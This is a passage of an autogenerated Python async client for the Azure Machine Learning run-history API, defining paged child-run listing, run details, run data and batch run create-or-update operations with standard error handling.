from ...operations._runs_operations import build_add_or_modify_by_experiment_id_request, build_add_or_modify_by_experiment_name_request, build_add_or_modify_experiment_request, build_add_request, build_batch_add_or_modify_by_experiment_id_request, build_batch_add_or_modify_by_experiment_name_request, build_batch_get_run_data_request, build_cancel_run_with_uri_by_experiment_id_request, build_cancel_run_with_uri_by_experiment_name_request, build_delete_run_services_by_experiment_id_request, build_delete_run_services_by_experiment_name_request, build_delete_run_services_request, build_delete_tags_by_experiment_id_request, build_delete_tags_by_experiment_name_request, build_delete_tags_request, build_get_by_experiment_id_request, build_get_by_experiment_name_request, build_get_by_ids_by_experiment_id_request, build_get_by_ids_by_experiment_name_request, build_get_by_query_by_experiment_id_request, build_get_by_query_by_experiment_name_request, build_get_child_by_experiment_id_request, build_get_child_by_experiment_name_request, build_get_child_request, build_get_details_by_experiment_id_request, build_get_details_by_experiment_name_request, build_get_details_request, build_get_request, build_get_run_data_request, build_modify_or_delete_tags_by_experiment_id_request, build_modify_or_delete_tags_by_experiment_name_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RunsOperations:
"""RunsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.machinelearningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get_child_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/children'} # type: ignore
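# A hedged consumption sketch for the pager returned above (the client variable
# and identifier values are illustrative assumptions, not part of this module):
#
#     async for run in client.runs.get_child_by_experiment_name(
#             subscription_id="...", resource_group_name="...",
#             workspace_name="...", run_id="...",
#             experiment_name="...", top=50):
#         print(run)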
@distributed_trace
def get_child_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/children'} # type: ignore
@distributed_trace
def get_child(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/children'} # type: ignore
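    # Usage sketch for the paged listing above (illustrative only; ``runs_op`` is
    # an assumed name for an instance of this operations class obtained from the
    # service client, and all identifier values are placeholders):
    #
    #     pager = runs_op.get_child(
    #         subscription_id="<subscription-id>",
    #         resource_group_name="<resource-group>",
    #         workspace_name="<workspace>",
    #         run_id="<parent-run-id>",
    #         top=50,
    #     )
    #     async for child_run in pager:
    #         print(child_run)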
@distributed_trace_async
async def get_details_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
**kwargs: Any
    ) -> "_models.RunDetails":
        """Get the details of a run, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_id: The identifier of the experiment that contains the run.
        :type experiment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
template_url=self.get_details_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/details'} # type: ignore
@distributed_trace_async
async def get_details_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
**kwargs: Any
    ) -> "_models.RunDetails":
        """Get the details of a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
template_url=self.get_details_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/details'} # type: ignore
@distributed_trace_async
async def get_details(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
**kwargs: Any
    ) -> "_models.RunDetails":
        """Get the details of a run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
template_url=self.get_details.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/details'} # type: ignore
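    # Usage sketch (illustrative; ``runs_op`` is an assumed instance of this
    # operations class):
    #
    #     details = await runs_op.get_details(
    #         subscription_id="<subscription-id>",
    #         resource_group_name="<resource-group>",
    #         workspace_name="<workspace>",
    #         run_id="<run-id>",
    #     )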
@distributed_trace_async
async def get_run_data(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
body: Optional["_models.GetRunDataRequest"] = None,
**kwargs: Any
    ) -> "_models.GetRunDataResult":
        """Get run data for a single run.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param body: The request payload describing which run data to retrieve.
        :type body: ~azure.mgmt.machinelearningservices.models.GetRunDataRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: GetRunDataResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.GetRunDataResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GetRunDataResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunDataRequest')
else:
_json = None
request = build_get_run_data_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
content_type=content_type,
json=_json,
template_url=self.get_run_data.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('GetRunDataResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_run_data.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/rundata'} # type: ignore
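    # Usage sketch (illustrative; the GetRunDataRequest constructor arguments are
    # assumptions that depend on the models package):
    #
    #     body = _models.GetRunDataRequest(...)  # populate run selectors as needed
    #     result = await runs_op.get_run_data(
    #         subscription_id, resource_group_name, workspace_name, body=body,
    #     )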
@distributed_trace_async
async def batch_get_run_data(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
body: Optional["_models.BatchRequest1"] = None,
**kwargs: Any
    ) -> "_models.BatchResult1":
        """Get run data for a batch of runs.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param body: The batch request payload.
        :type body: ~azure.mgmt.machinelearningservices.models.BatchRequest1
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchResult1, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchResult1
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchResult1"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchRequest1')
else:
_json = None
request = build_batch_get_run_data_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
content_type=content_type,
json=_json,
template_url=self.batch_get_run_data.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 207]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # Both 200 and 207 (multi-status) responses carry a BatchResult1 payload.
        deserialized = self._deserialize('BatchResult1', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_get_run_data.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/batchrundata'} # type: ignore
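    # Usage sketch (illustrative). Because HTTP 207 (multi-status) is accepted, a
    # partially successful batch still returns a BatchResult1 instead of raising,
    # so callers may want to inspect the result for per-run failures:
    #
    #     batch = await runs_op.batch_get_run_data(
    #         subscription_id, resource_group_name, workspace_name,
    #         body=_models.BatchRequest1(...),  # per-run requests; fields vary
    #     )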
@distributed_trace_async
async def batch_add_or_modify_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.BatchAddOrModifyRunRequest"] = None,
**kwargs: Any
    ) -> "_models.BatchRunResult":
        """Create or update a batch of runs, addressed by experiment ID.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param experiment_id: The identifier of the experiment.
        :type experiment_id: str
        :param body: The batch of runs to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.BatchAddOrModifyRunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchAddOrModifyRunRequest')
else:
_json = None
request = build_batch_add_or_modify_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.batch_add_or_modify_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_add_or_modify_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/batch/runs'} # type: ignore
@distributed_trace_async
async def batch_add_or_modify_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.BatchAddOrModifyRunRequest"] = None,
**kwargs: Any
    ) -> "_models.BatchRunResult":
        """Create or update a batch of runs, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param experiment_name: The name of the experiment.
        :type experiment_name: str
        :param body: The batch of runs to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.BatchAddOrModifyRunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchAddOrModifyRunRequest')
else:
_json = None
request = build_batch_add_or_modify_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.batch_add_or_modify_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_add_or_modify_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/batch/runs'} # type: ignore
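    # Usage sketch covering both batch add-or-modify flavors above (illustrative;
    # BatchAddOrModifyRunRequest fields are assumptions):
    #
    #     result = await runs_op.batch_add_or_modify_by_experiment_name(
    #         subscription_id, resource_group_name, workspace_name,
    #         experiment_name="<experiment>",
    #         body=_models.BatchAddOrModifyRunRequest(...),  # runs to create/update
    #     )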
@distributed_trace_async
async def add_or_modify_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
    ) -> "_models.Run":
        """Create or update a run, addressed by experiment name.
        :param subscription_id: The Azure Subscription ID.
        :type subscription_id: str
        :param resource_group_name: The name of the resource group in which the workspace is located.
        :type resource_group_name: str
        :param workspace_name: The name of the workspace.
        :type workspace_name: str
        :param run_id: The identifier of the run.
        :type run_id: str
        :param experiment_name: The name of the experiment that contains the run.
        :type experiment_name: str
        :param body: The run definition to create or update.
        :type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}'} # type: ignore
@distributed_trace_async
